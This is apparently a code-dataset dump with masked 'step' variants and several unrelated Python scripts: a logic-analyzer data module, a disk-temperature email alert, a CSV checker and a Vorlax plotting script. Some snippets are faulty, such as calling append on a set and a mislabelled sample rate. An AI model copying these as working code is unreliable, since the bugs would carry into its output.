for theme in self.themes] def theme_named(self, name): """ Returns the theme named name. Paramters --------- name : str The name of the theme to return. Returns ------- Returns the theme as a dict, or an empty dict if theme could not be found. """ for theme in self.themes: if theme.get('name', 'Error') == name: return theme
normal
{ "blob_id": "ec44e12624fbee3148cfa4f886e86ba437e920ec", "index": 4158, "step-1": "<mask token>\n\n\nclass Acquisition:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def csv_string(self):\n out_string = '#sample_rate=%d' % self.sample_rate\n for row in zip(*self.data):\n out_string += str(row)[1:-1].replace(' ', '')\n out_string += '\\n'\n return out_string\n <mask token>\n <mask token>\n\n def __getitem__(self, key):\n return self.data[key]\n <mask token>\n\n\nclass AnalyzerCommand:\n \"\"\"\n Simple class to hold analyzer commands and create appropriate command bytes\n to be sent to the firmware.\n \"\"\"\n sample_counts = OrderedDict((('200K', 200000), ('100K', 100000), ('50K',\n 50000), ('10K', 10000), ('2K', 2000)))\n sample_rates = OrderedDict((('1 MS/s', 1000000), ('500 KS/s', 500000),\n ('200 KS/s', 200000), ('100 KS/s', 10000)))\n\n def __init__(self, sample_rate=1000000.0, sample_count=64000,\n trigger_type=0, trigger_channel=0):\n sp = int(1.0 / sample_rate / 1e-06)\n self.sample_count = sample_count\n self.sample_rate = sample_rate\n sample_count /= 1000\n self.command_bytes = [1, sp & 255, sp >> 8, sample_count & 255, \n sample_count >> 8, trigger_type, trigger_channel]\n self.command_bytes = ''.join([chr(x) for x in self.command_bytes]\n ) + ' ' * (64 - len(self.command_bytes))\n\n\nclass ThemeManager:\n \"\"\"\n A class to manage and load themes for the signal display.\n \"\"\"\n\n def __init__(self, theme_dir):\n self.theme_dir = theme_dir\n self.refresh()\n\n def refresh(self):\n self.themes = []\n for fname in os.listdir(self.theme_dir):\n if fname.endswith('.json'):\n try:\n j = json.loads(open(os.path.join(self.theme_dir, fname)\n ).read())\n self.themes.append(j)\n except:\n continue\n\n def theme_names(self):\n \"\"\"\n Returns the names for each theme.\n \"\"\"\n return [theme.get('name', 'Error') for theme in self.themes]\n\n def theme_named(self, name):\n \"\"\"\n Returns the theme named name.\n\n Paramters\n ---------\n name : str\n The name of the theme to return.\n\n Returns\n -------\n Returns the theme as a dict, or an empty dict if theme could not be\n found.\n \"\"\"\n for theme in self.themes:\n if theme.get('name', 'Error') == name:\n return theme\n", "step-2": "<mask token>\n\n\nclass Acquisition:\n <mask token>\n <mask token>\n\n @property\n def dt(self):\n return 1.0 / self.sample_rate\n <mask token>\n\n @property\n def channel_count(self):\n return len(self.data)\n\n def csv_string(self):\n out_string = '#sample_rate=%d' % self.sample_rate\n for row in zip(*self.data):\n out_string += str(row)[1:-1].replace(' ', '')\n out_string += '\\n'\n return out_string\n <mask token>\n <mask token>\n\n def __getitem__(self, key):\n return self.data[key]\n <mask token>\n\n\nclass AnalyzerCommand:\n \"\"\"\n Simple class to hold analyzer commands and create appropriate command bytes\n to be sent to the firmware.\n \"\"\"\n sample_counts = OrderedDict((('200K', 200000), ('100K', 100000), ('50K',\n 50000), ('10K', 10000), ('2K', 2000)))\n sample_rates = OrderedDict((('1 MS/s', 1000000), ('500 KS/s', 500000),\n ('200 KS/s', 200000), ('100 KS/s', 10000)))\n\n def __init__(self, sample_rate=1000000.0, sample_count=64000,\n trigger_type=0, trigger_channel=0):\n sp = int(1.0 / sample_rate / 1e-06)\n self.sample_count = sample_count\n self.sample_rate = sample_rate\n sample_count /= 1000\n self.command_bytes = [1, sp & 255, sp >> 8, sample_count & 255, \n sample_count >> 8, trigger_type, trigger_channel]\n self.command_bytes = ''.join([chr(x) for x in self.command_bytes]\n ) + ' ' * (64 - len(self.command_bytes))\n\n\nclass ThemeManager:\n \"\"\"\n A class to manage and load themes for the signal display.\n \"\"\"\n\n def __init__(self, theme_dir):\n self.theme_dir = theme_dir\n self.refresh()\n\n def refresh(self):\n self.themes = []\n for fname in os.listdir(self.theme_dir):\n if fname.endswith('.json'):\n try:\n j = json.loads(open(os.path.join(self.theme_dir, fname)\n ).read())\n self.themes.append(j)\n except:\n continue\n\n def theme_names(self):\n \"\"\"\n Returns the names for each theme.\n \"\"\"\n return [theme.get('name', 'Error') for theme in self.themes]\n\n def theme_named(self, name):\n \"\"\"\n Returns the theme named name.\n\n Paramters\n ---------\n name : str\n The name of the theme to return.\n\n Returns\n -------\n Returns the theme as a dict, or an empty dict if theme could not be\n found.\n \"\"\"\n for theme in self.themes:\n if theme.get('name', 'Error') == name:\n return theme\n", "step-3": "<mask token>\n\n\nclass Acquisition:\n <mask token>\n <mask token>\n\n @property\n def dt(self):\n return 1.0 / self.sample_rate\n\n @property\n def acquisition_length(self):\n return len(self.data[0])\n\n @property\n def channel_count(self):\n return len(self.data)\n\n def csv_string(self):\n out_string = '#sample_rate=%d' % self.sample_rate\n for row in zip(*self.data):\n out_string += str(row)[1:-1].replace(' ', '')\n out_string += '\\n'\n return out_string\n\n def load_csv_file(self, fname):\n with open(fname) as f:\n reader = csv.reader(f)\n header = next(reader)\n sample_rate = int(header[0].split('=')[-1])\n data = [[int(d) for d in row] for row in reader if len(row) != 1]\n self.data = list(zip(*data))\n self.sample_rate = sample_rate\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, key):\n return self.data[key]\n\n def __iter__(self):\n return iter(self.data)\n\n\nclass AnalyzerCommand:\n \"\"\"\n Simple class to hold analyzer commands and create appropriate command bytes\n to be sent to the firmware.\n \"\"\"\n sample_counts = OrderedDict((('200K', 200000), ('100K', 100000), ('50K',\n 50000), ('10K', 10000), ('2K', 2000)))\n sample_rates = OrderedDict((('1 MS/s', 1000000), ('500 KS/s', 500000),\n ('200 KS/s', 200000), ('100 KS/s', 10000)))\n\n def __init__(self, sample_rate=1000000.0, sample_count=64000,\n trigger_type=0, trigger_channel=0):\n sp = int(1.0 / sample_rate / 1e-06)\n self.sample_count = sample_count\n self.sample_rate = sample_rate\n sample_count /= 1000\n self.command_bytes = [1, sp & 255, sp >> 8, sample_count & 255, \n sample_count >> 8, trigger_type, trigger_channel]\n self.command_bytes = ''.join([chr(x) for x in self.command_bytes]\n ) + ' ' * (64 - len(self.command_bytes))\n\n\nclass ThemeManager:\n \"\"\"\n A class to manage and load themes for the signal display.\n \"\"\"\n\n def __init__(self, theme_dir):\n self.theme_dir = theme_dir\n self.refresh()\n\n def refresh(self):\n self.themes = []\n for fname in os.listdir(self.theme_dir):\n if fname.endswith('.json'):\n try:\n j = json.loads(open(os.path.join(self.theme_dir, fname)\n ).read())\n self.themes.append(j)\n except:\n continue\n\n def theme_names(self):\n \"\"\"\n Returns the names for each theme.\n \"\"\"\n return [theme.get('name', 'Error') for theme in self.themes]\n\n def theme_named(self, name):\n \"\"\"\n Returns the theme named name.\n\n Paramters\n ---------\n name : str\n The name of the theme to return.\n\n Returns\n -------\n Returns the theme as a dict, or an empty dict if theme could not be\n found.\n \"\"\"\n for theme in self.themes:\n if theme.get('name', 'Error') == name:\n return theme\n", "step-4": "<mask token>\n\n\nclass Acquisition:\n <mask token>\n\n def __init__(self, data, sample_rate=1, channel_count=None):\n if isinstance(data, list):\n if len(data) not in VALID_CHANNEL_COUNTS:\n raise ValueError('data must have length %s' % str(\n VALID_CHANNEL_COUNTS))\n l = len(data[0])\n for channel in data:\n if len(channel) != l:\n raise ValueError('All channels must be have same length.')\n self.data = data\n elif isinstance(data, bytes):\n if channel_count not in VALID_CHANNEL_COUNTS:\n raise ValueError('Invalid number of channels.')\n sep_channel_data = [f(c) for c in data for f in (lambda x: ord(\n x) >> 4, lambda x: ord(x) & 15)]\n unpacked_data = [[int(i) for i in list(bin(d)[2:].zfill(4))] for\n d in sep_channel_data]\n self.data = list(zip(*unpacked_data))\n self.data.reverse()\n elif isinstance(data, str):\n self.load_csv_file(data)\n return\n else:\n raise TypeError('Invalid data type')\n self.sample_rate = sample_rate\n\n @property\n def dt(self):\n return 1.0 / self.sample_rate\n\n @property\n def acquisition_length(self):\n return len(self.data[0])\n\n @property\n def channel_count(self):\n return len(self.data)\n\n def csv_string(self):\n out_string = '#sample_rate=%d' % self.sample_rate\n for row in zip(*self.data):\n out_string += str(row)[1:-1].replace(' ', '')\n out_string += '\\n'\n return out_string\n\n def load_csv_file(self, fname):\n with open(fname) as f:\n reader = csv.reader(f)\n header = next(reader)\n sample_rate = int(header[0].split('=')[-1])\n data = [[int(d) for d in row] for row in reader if len(row) != 1]\n self.data = list(zip(*data))\n self.sample_rate = sample_rate\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, key):\n return self.data[key]\n\n def __iter__(self):\n return iter(self.data)\n\n\nclass AnalyzerCommand:\n \"\"\"\n Simple class to hold analyzer commands and create appropriate command bytes\n to be sent to the firmware.\n \"\"\"\n sample_counts = OrderedDict((('200K', 200000), ('100K', 100000), ('50K',\n 50000), ('10K', 10000), ('2K', 2000)))\n sample_rates = OrderedDict((('1 MS/s', 1000000), ('500 KS/s', 500000),\n ('200 KS/s', 200000), ('100 KS/s', 10000)))\n\n def __init__(self, sample_rate=1000000.0, sample_count=64000,\n trigger_type=0, trigger_channel=0):\n sp = int(1.0 / sample_rate / 1e-06)\n self.sample_count = sample_count\n self.sample_rate = sample_rate\n sample_count /= 1000\n self.command_bytes = [1, sp & 255, sp >> 8, sample_count & 255, \n sample_count >> 8, trigger_type, trigger_channel]\n self.command_bytes = ''.join([chr(x) for x in self.command_bytes]\n ) + ' ' * (64 - len(self.command_bytes))\n\n\nclass ThemeManager:\n \"\"\"\n A class to manage and load themes for the signal display.\n \"\"\"\n\n def __init__(self, theme_dir):\n self.theme_dir = theme_dir\n self.refresh()\n\n def refresh(self):\n self.themes = []\n for fname in os.listdir(self.theme_dir):\n if fname.endswith('.json'):\n try:\n j = json.loads(open(os.path.join(self.theme_dir, fname)\n ).read())\n self.themes.append(j)\n except:\n continue\n\n def theme_names(self):\n \"\"\"\n Returns the names for each theme.\n \"\"\"\n return [theme.get('name', 'Error') for theme in self.themes]\n\n def theme_named(self, name):\n \"\"\"\n Returns the theme named name.\n\n Paramters\n ---------\n name : str\n The name of the theme to return.\n\n Returns\n -------\n Returns the theme as a dict, or an empty dict if theme could not be\n found.\n \"\"\"\n for theme in self.themes:\n if theme.get('name', 'Error') == name:\n return theme\n", "step-5": "\"\"\"\nThis file contains the general data storage classes used throughout Logician.\n\"\"\"\nimport csv\nimport json\nimport os\nfrom collections import OrderedDict\n\nVALID_CHANNEL_COUNTS = [4]\n\n\nclass Acquisition:\n \"\"\"\n The acqusition object contains data from all of the acquired channels.\n\n Parameters\n ----------\n data : array or bytes or str\n Array of form [[1, 0, 0, ...], [0, 0, 1, ...], ...]\n or bytes of data.\n If data is bytes, channel_count must be provided.\n\n samplerate : int\n The acquisition rate in Samples / sec.\n \"\"\"\n def __init__(self, data, sample_rate=1, channel_count=None):\n if isinstance(data, list):\n if len(data) not in VALID_CHANNEL_COUNTS:\n raise ValueError('data must have length %s'\n % str(VALID_CHANNEL_COUNTS))\n l = len(data[0])\n for channel in data:\n if len(channel) != l:\n raise ValueError('All channels must be have same length.')\n self.data = data\n elif isinstance(data, bytes):\n if channel_count not in VALID_CHANNEL_COUNTS:\n raise ValueError('Invalid number of channels.')\n # Convert byte string to list of 1's and 0's. If there are 4\n # channels each byte should have 2 4 channel samples in it. The MSB\n # is the 4th channel of the least recent sample.\n sep_channel_data = [f(c) for c in data\n for f in (lambda x: ord(x) >> 4,\n lambda x: ord(x) & 0x0F)]\n unpacked_data = [[int(i) for i in list(bin(d)[2:].zfill(4))]\n for d in sep_channel_data]\n self.data = list(zip(*unpacked_data))\n self.data.reverse()\n elif isinstance(data, str):\n self.load_csv_file(data)\n return\n else:\n raise TypeError('Invalid data type')\n self.sample_rate = sample_rate\n\n @property\n def dt(self):\n return 1.0 / self.sample_rate\n\n @property\n def acquisition_length(self):\n return len(self.data[0])\n\n @property\n def channel_count(self):\n return len(self.data)\n\n def csv_string(self):\n out_string = '#sample_rate=%d' % self.sample_rate\n for row in zip(*self.data):\n out_string += str(row)[1:-1].replace(' ', '')\n out_string += '\\n'\n return out_string\n\n def load_csv_file(self, fname):\n with open(fname) as f:\n reader = csv.reader(f)\n header = next(reader)\n sample_rate = int(header[0].split('=')[-1])\n data = [[int(d) for d in row] for row in reader\n if len(row) != 1]\n self.data = list(zip(*data))\n self.sample_rate = sample_rate\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, key):\n return self.data[key]\n\n def __iter__(self):\n return iter(self.data)\n\n\nclass AnalyzerCommand:\n \"\"\"\n Simple class to hold analyzer commands and create appropriate command bytes\n to be sent to the firmware.\n \"\"\"\n sample_counts = OrderedDict((('200K', 200000),\n ('100K', 100000),\n ('50K', 50000),\n ('10K', 10000),\n ('2K', 2000)))\n sample_rates = OrderedDict((('1 MS/s', 1000000),\n ('500 KS/s', 500000),\n ('200 KS/s', 200000),\n ('100 KS/s', 10000)))\n\n def __init__(self, sample_rate=1e6, sample_count=64000,\n trigger_type=0, trigger_channel=0):\n sp = int(1.0 / sample_rate / 1e-6)\n self.sample_count = sample_count\n self.sample_rate = sample_rate\n sample_count /= 1000\n self.command_bytes = \\\n [0x01, # Command\n (sp & 0x00FF), (sp >> 8), # Sample Period (us)\n (sample_count & 0x00FF), (sample_count >> 8),\n trigger_type, trigger_channel]\n self.command_bytes = (''.join([chr(x) for x in self.command_bytes]) +\n ' '*(64 - len(self.command_bytes)))\n\n\nclass ThemeManager:\n \"\"\"\n A class to manage and load themes for the signal display.\n \"\"\"\n def __init__(self, theme_dir):\n self.theme_dir = theme_dir\n self.refresh()\n\n def refresh(self):\n self.themes = []\n for fname in os.listdir(self.theme_dir):\n if fname.endswith('.json'):\n try:\n j = json.loads(\n open(os.path.join(self.theme_dir, fname)).read())\n self.themes.append(j)\n except:\n continue\n\n def theme_names(self):\n \"\"\"\n Returns the names for each theme.\n \"\"\"\n return [theme.get('name', 'Error') for theme in self.themes]\n\n def theme_named(self, name):\n \"\"\"\n Returns the theme named name.\n\n Paramters\n ---------\n name : str\n The name of the theme to return.\n\n Returns\n -------\n Returns the theme as a dict, or an empty dict if theme could not be\n found.\n \"\"\"\n for theme in self.themes:\n if theme.get('name', 'Error') == name:\n return theme\n", "step-ids": [ 13, 15, 19, 20, 24 ] }
[ 13, 15, 19, 20, 24 ]
""" Write two functions: 1. `to_list()`, which converts a number to an integer list of its digits. 2. `to_number()`, which converts a list of integers back to its number. ### Examples to_list(235) ➞ [2, 3, 5] to_list(0) ➞ [0] to_number([2, 3, 5]) ➞ 235 to_number([0]) ➞ 0 ### Notes All test cases will be weakly positive numbers: `>= 0` """ def to_list(num): a=list(map(int,str(num))) return a ​ def to_number(lst): res=int("".join(map(str,lst))) return res
normal
{ "blob_id": "5cced6d9f5e01b88951059bc89c5d10cfd160f60", "index": 8826, "step-1": "\"\"\"\r\n\n\nWrite two functions:\n\n 1. `to_list()`, which converts a number to an integer list of its digits.\n 2. `to_number()`, which converts a list of integers back to its number.\n\n### Examples\n\n to_list(235) ➞ [2, 3, 5]\n \n to_list(0) ➞ [0]\n \n to_number([2, 3, 5]) ➞ 235\n \n to_number([0]) ➞ 0\n\n### Notes\n\nAll test cases will be weakly positive numbers: `>= 0`\n\n\"\"\"\r\n\ndef to_list(num):\n a=list(map(int,str(num)))\n return a\n \n​\ndef to_number(lst):\n res=int(\"\".join(map(str,lst)))\n return res\n\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
#!/usr/bin/env python3 import os import subprocess import emailgen # # Header information # recipient = input("recipient: ") sender = input("sender: ") password = input("sender password: ") subject = "hdd temp alert" # # Get hdd temp, format for email # output = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc', shell=True) text = output.decode('utf-8') # # Email requires ascii # text = text.encode('ascii','ignore') text = text.decode('ascii') # # Add descriptive information to text # text += "\nHostname: " + os.uname().nodename # # Call sendAlert function # emailgen.sendAlert(recipient, subject, text, sender, password)
normal
{ "blob_id": "26a6fe0b2a98aa77b63a336cd6c2afcfe81d9058", "index": 7680, "step-1": "<mask token>\n", "step-2": "<mask token>\ntext += '\\nHostname: ' + os.uname().nodename\nemailgen.sendAlert(recipient, subject, text, sender, password)\n", "step-3": "<mask token>\nrecipient = input('recipient: ')\nsender = input('sender: ')\npassword = input('sender password: ')\nsubject = 'hdd temp alert'\noutput = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc',\n shell=True)\ntext = output.decode('utf-8')\ntext = text.encode('ascii', 'ignore')\ntext = text.decode('ascii')\ntext += '\\nHostname: ' + os.uname().nodename\nemailgen.sendAlert(recipient, subject, text, sender, password)\n", "step-4": "import os\nimport subprocess\nimport emailgen\nrecipient = input('recipient: ')\nsender = input('sender: ')\npassword = input('sender password: ')\nsubject = 'hdd temp alert'\noutput = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc',\n shell=True)\ntext = output.decode('utf-8')\ntext = text.encode('ascii', 'ignore')\ntext = text.decode('ascii')\ntext += '\\nHostname: ' + os.uname().nodename\nemailgen.sendAlert(recipient, subject, text, sender, password)\n", "step-5": "#!/usr/bin/env python3\nimport os\nimport subprocess\nimport emailgen\n\n\n#\n# Header information\n#\nrecipient = input(\"recipient: \")\nsender = input(\"sender: \")\npassword = input(\"sender password: \")\nsubject = \"hdd temp alert\"\n\n#\n# Get hdd temp, format for email\n#\noutput = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc', shell=True)\ntext = output.decode('utf-8')\n\n#\n# Email requires ascii\n#\ntext = text.encode('ascii','ignore')\ntext = text.decode('ascii')\n\n#\n# Add descriptive information to text\n#\ntext += \"\\nHostname: \" + os.uname().nodename\n\n#\n# Call sendAlert function\n#\nemailgen.sendAlert(recipient, subject, text, sender, password)\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import csv with open('./csvs/users.csv', encoding='utf-8', newline='') as users_csv: reader = csv.reader(users_csv) d = {} for row in reader: userId, profileName = row if profileName == 'A Customer': continue value = d.get(profileName) if not value: d.setdefault(profileName, userId) else: if value != userId: print(f'{userId}, {value}, {profileName}')
normal
{ "blob_id": "3b77f7ea5137174e6723368502659390ea064c5a", "index": 8968, "step-1": "<mask token>\n", "step-2": "<mask token>\nwith open('./csvs/users.csv', encoding='utf-8', newline='') as users_csv:\n reader = csv.reader(users_csv)\n d = {}\n for row in reader:\n userId, profileName = row\n if profileName == 'A Customer':\n continue\n value = d.get(profileName)\n if not value:\n d.setdefault(profileName, userId)\n elif value != userId:\n print(f'{userId}, {value}, {profileName}')\n", "step-3": "import csv\nwith open('./csvs/users.csv', encoding='utf-8', newline='') as users_csv:\n reader = csv.reader(users_csv)\n d = {}\n for row in reader:\n userId, profileName = row\n if profileName == 'A Customer':\n continue\n value = d.get(profileName)\n if not value:\n d.setdefault(profileName, userId)\n elif value != userId:\n print(f'{userId}, {value}, {profileName}')\n", "step-4": "import csv\n\nwith open('./csvs/users.csv', encoding='utf-8', newline='') as users_csv:\n reader = csv.reader(users_csv)\n d = {}\n for row in reader:\n userId, profileName = row\n if profileName == 'A Customer':\n continue\n value = d.get(profileName)\n if not value:\n d.setdefault(profileName, userId)\n else:\n if value != userId:\n print(f'{userId}, {value}, {profileName}')", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import numpy as np raw = np.load("raw_with_freq.npy").item() for i in list(raw.keys()): if len(i) > 8: del(raw[i]) print(raw) print(len(list(raw.keys()))) np.save("shorten_raw_with_freq.npy", raw)
normal
{ "blob_id": "ffb17b370c892696b341f6d37a2cfe106a5670a5", "index": 4265, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor i in list(raw.keys()):\n if len(i) > 8:\n del raw[i]\nprint(raw)\nprint(len(list(raw.keys())))\nnp.save('shorten_raw_with_freq.npy', raw)\n", "step-3": "<mask token>\nraw = np.load('raw_with_freq.npy').item()\nfor i in list(raw.keys()):\n if len(i) > 8:\n del raw[i]\nprint(raw)\nprint(len(list(raw.keys())))\nnp.save('shorten_raw_with_freq.npy', raw)\n", "step-4": "import numpy as np\nraw = np.load('raw_with_freq.npy').item()\nfor i in list(raw.keys()):\n if len(i) > 8:\n del raw[i]\nprint(raw)\nprint(len(list(raw.keys())))\nnp.save('shorten_raw_with_freq.npy', raw)\n", "step-5": "import numpy as np\nraw = np.load(\"raw_with_freq.npy\").item()\nfor i in list(raw.keys()):\n\tif len(i) > 8:\n\t\tdel(raw[i])\nprint(raw)\nprint(len(list(raw.keys())))\nnp.save(\"shorten_raw_with_freq.npy\", raw)\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
def lengthOfLongestSubstring(s): max_len = 0 for i in range(len(s)): storage = set() count = 0 for j in range(i, len(s)): if not s[j] in storage: storage.append(s[j]) count += 1 else: break max_len = max(max_len, count) return max_len print(lengthOfLongestSubstring('abcabcbb'))
normal
{ "blob_id": "7e83d11bb43229eaa199514b4be6a0acf3ab36ce", "index": 4395, "step-1": "<mask token>\n", "step-2": "def lengthOfLongestSubstring(s):\n max_len = 0\n for i in range(len(s)):\n storage = set()\n count = 0\n for j in range(i, len(s)):\n if not s[j] in storage:\n storage.append(s[j])\n count += 1\n else:\n break\n max_len = max(max_len, count)\n return max_len\n\n\n<mask token>\n", "step-3": "def lengthOfLongestSubstring(s):\n max_len = 0\n for i in range(len(s)):\n storage = set()\n count = 0\n for j in range(i, len(s)):\n if not s[j] in storage:\n storage.append(s[j])\n count += 1\n else:\n break\n max_len = max(max_len, count)\n return max_len\n\n\nprint(lengthOfLongestSubstring('abcabcbb'))\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
# -*- coding: utf-8 -*- """ VorRun Runs Vorlax and plots wireframe output from Vorlax (https://github.com/GalaxyHobo/VORLAX) NOTE! Type: "%matplotlib auto" in iPython console to switch to interactive plots, or "%matplotlib inline" to switch to inline, in the console. NOTE! Reads path to Vorlax .exe in "path.txt" file that resides in same directory as vorRun.py. The path in that file must be on the first line and begin with drive letter + colon, or "\". Assumes C-drive if path begins with "\". Lance Bays """ import os from mpl_toolkits.mplot3d import axes3d import matplotlib.pyplot as plt import numpy as np # Establish working directory with exe... # Copy & paste absolute path on Local machine here within double quotes # Read path to working directory fout = open("path.txt", 'r') userExePath=fout.readline() fout.close() # Split drive Letter from path drive, exePath = userExePath.split("\\", 1) # Handle case where user doesn't include drive in path — # we will assume it's on the C drive. if not drive: drive="C:" # Run program # Command-line instructions to change drive & directory, and run program runString = drive + " && cd \\" + exePath + " && vorlax.exe" os.system( runString) # Read output file fout = open(drive + "\\" + exePath + "\\VORLAX.WIRE", 'r') lines=fout.readlines() fout.close() # Convert to numpy array panelData=[] for index, line in enumerate(lines): panelData.append(np.array(list(map(float,lines[index].split())))) panelData=np.array(panelData) # Determine array of unique panel ID's panelNums = np.unique(panelData[0:,0:1]) # Add subplot fig = plt.figure() ax = fig.add_subplot(111, projection='3d') # Plot the Vorlax wireframe (one side) for index in panelNums: ax.plot_wireframe( panelData[panelData[:,0]==index][:,np.array([False,True,False,False,False])], panelData[panelData[:,0]==index][:,np.array([False,False,True,False,False])], panelData[panelData[:,0]==index][:,np.array([False,False,False,True,False])]) # Plot the mirror image (if symmetry is indicated in wire file) for index in panelNums: symFlag=panelData[panelData[:,0]==index][0,np.array([False,False,False,False,True])] if symFlag==0 or symFlag==2: ax.plot_wireframe( panelData[panelData[:,0]==index][:,np.array([False,True,False,False,False])], -1*panelData[panelData[:,0]==index][:,np.array([False,False,True,False,False])], panelData[panelData[:,0]==index][:,np.array([False,False,False,True,False])]) # Format plot ax.grid() ax.set(ylabel='y-in', xlabel='x-in', zlabel='z-in', title='') ax.xaxis.label.set_size(16) ax.yaxis.label.set_size(16) ax.zaxis.label.set_size(16) # Create super-set of data to establish ranges x=panelData[:,1] y=panelData[:,2] negativey = -1 * panelData[:,2] y=np.concatenate((y, negativey), axis=0) z=panelData[:,3] # Set equal scales on axes ax.set_aspect('equal') # Set ranges for plot max_range = np.array([x.max() - x.min(), y.max() - y.min(), z.max() - z.min()]).max() / 2.0 # Compute midpoints in each direction mid_x = (x.max() + x.min()) * 0.5 mid_y = (y.max() + y.min()) * 0.5 mid_z = (z.max() + z.min()) * 0.5 # Set final ranges ax.set_xlim(mid_x - max_range, mid_x + max_range) ax.set_ylim(mid_y - max_range, mid_y + max_range) ax.set_zlim(mid_z - max_range, mid_z + max_range) plt.show()
normal
{ "blob_id": "9aee715e976db632f0829a06cb9e0101c90512be", "index": 2150, "step-1": "<mask token>\n", "step-2": "<mask token>\nfout.close()\n<mask token>\nif not drive:\n drive = 'C:'\n<mask token>\nos.system(runString)\n<mask token>\nfout.close()\n<mask token>\nfor index, line in enumerate(lines):\n panelData.append(np.array(list(map(float, lines[index].split()))))\n<mask token>\nfor index in panelNums:\n ax.plot_wireframe(panelData[panelData[:, 0] == index][:, np.array([\n False, True, False, False, False])], panelData[panelData[:, 0] ==\n index][:, np.array([False, False, True, False, False])], panelData[\n panelData[:, 0] == index][:, np.array([False, False, False, True, \n False])])\nfor index in panelNums:\n symFlag = panelData[panelData[:, 0] == index][0, np.array([False, False,\n False, False, True])]\n if symFlag == 0 or symFlag == 2:\n ax.plot_wireframe(panelData[panelData[:, 0] == index][:, np.array([\n False, True, False, False, False])], -1 * panelData[panelData[:,\n 0] == index][:, np.array([False, False, True, False, False])],\n panelData[panelData[:, 0] == index][:, np.array([False, False, \n False, True, False])])\nax.grid()\nax.set(ylabel='y-in', xlabel='x-in', zlabel='z-in', title='')\nax.xaxis.label.set_size(16)\nax.yaxis.label.set_size(16)\nax.zaxis.label.set_size(16)\n<mask token>\nax.set_aspect('equal')\n<mask token>\nax.set_xlim(mid_x - max_range, mid_x + max_range)\nax.set_ylim(mid_y - max_range, mid_y + max_range)\nax.set_zlim(mid_z - max_range, mid_z + max_range)\nplt.show()\n", "step-3": "<mask token>\nfout = open('path.txt', 'r')\nuserExePath = fout.readline()\nfout.close()\ndrive, exePath = userExePath.split('\\\\', 1)\nif not drive:\n drive = 'C:'\nrunString = drive + ' && cd \\\\' + exePath + ' && vorlax.exe'\nos.system(runString)\nfout = open(drive + '\\\\' + exePath + '\\\\VORLAX.WIRE', 'r')\nlines = fout.readlines()\nfout.close()\npanelData = []\nfor index, line in enumerate(lines):\n panelData.append(np.array(list(map(float, lines[index].split()))))\npanelData = np.array(panelData)\npanelNums = np.unique(panelData[0:, 0:1])\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nfor index in panelNums:\n ax.plot_wireframe(panelData[panelData[:, 0] == index][:, np.array([\n False, True, False, False, False])], panelData[panelData[:, 0] ==\n index][:, np.array([False, False, True, False, False])], panelData[\n panelData[:, 0] == index][:, np.array([False, False, False, True, \n False])])\nfor index in panelNums:\n symFlag = panelData[panelData[:, 0] == index][0, np.array([False, False,\n False, False, True])]\n if symFlag == 0 or symFlag == 2:\n ax.plot_wireframe(panelData[panelData[:, 0] == index][:, np.array([\n False, True, False, False, False])], -1 * panelData[panelData[:,\n 0] == index][:, np.array([False, False, True, False, False])],\n panelData[panelData[:, 0] == index][:, np.array([False, False, \n False, True, False])])\nax.grid()\nax.set(ylabel='y-in', xlabel='x-in', zlabel='z-in', title='')\nax.xaxis.label.set_size(16)\nax.yaxis.label.set_size(16)\nax.zaxis.label.set_size(16)\nx = panelData[:, 1]\ny = panelData[:, 2]\nnegativey = -1 * panelData[:, 2]\ny = np.concatenate((y, negativey), axis=0)\nz = panelData[:, 3]\nax.set_aspect('equal')\nmax_range = np.array([x.max() - x.min(), y.max() - y.min(), z.max() - z.min()]\n ).max() / 2.0\nmid_x = (x.max() + x.min()) * 0.5\nmid_y = (y.max() + y.min()) * 0.5\nmid_z = (z.max() + z.min()) * 0.5\nax.set_xlim(mid_x - max_range, mid_x + max_range)\nax.set_ylim(mid_y - max_range, mid_y + max_range)\nax.set_zlim(mid_z - max_range, mid_z + max_range)\nplt.show()\n", "step-4": "<mask token>\nimport os\nfrom mpl_toolkits.mplot3d import axes3d\nimport matplotlib.pyplot as plt\nimport numpy as np\nfout = open('path.txt', 'r')\nuserExePath = fout.readline()\nfout.close()\ndrive, exePath = userExePath.split('\\\\', 1)\nif not drive:\n drive = 'C:'\nrunString = drive + ' && cd \\\\' + exePath + ' && vorlax.exe'\nos.system(runString)\nfout = open(drive + '\\\\' + exePath + '\\\\VORLAX.WIRE', 'r')\nlines = fout.readlines()\nfout.close()\npanelData = []\nfor index, line in enumerate(lines):\n panelData.append(np.array(list(map(float, lines[index].split()))))\npanelData = np.array(panelData)\npanelNums = np.unique(panelData[0:, 0:1])\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nfor index in panelNums:\n ax.plot_wireframe(panelData[panelData[:, 0] == index][:, np.array([\n False, True, False, False, False])], panelData[panelData[:, 0] ==\n index][:, np.array([False, False, True, False, False])], panelData[\n panelData[:, 0] == index][:, np.array([False, False, False, True, \n False])])\nfor index in panelNums:\n symFlag = panelData[panelData[:, 0] == index][0, np.array([False, False,\n False, False, True])]\n if symFlag == 0 or symFlag == 2:\n ax.plot_wireframe(panelData[panelData[:, 0] == index][:, np.array([\n False, True, False, False, False])], -1 * panelData[panelData[:,\n 0] == index][:, np.array([False, False, True, False, False])],\n panelData[panelData[:, 0] == index][:, np.array([False, False, \n False, True, False])])\nax.grid()\nax.set(ylabel='y-in', xlabel='x-in', zlabel='z-in', title='')\nax.xaxis.label.set_size(16)\nax.yaxis.label.set_size(16)\nax.zaxis.label.set_size(16)\nx = panelData[:, 1]\ny = panelData[:, 2]\nnegativey = 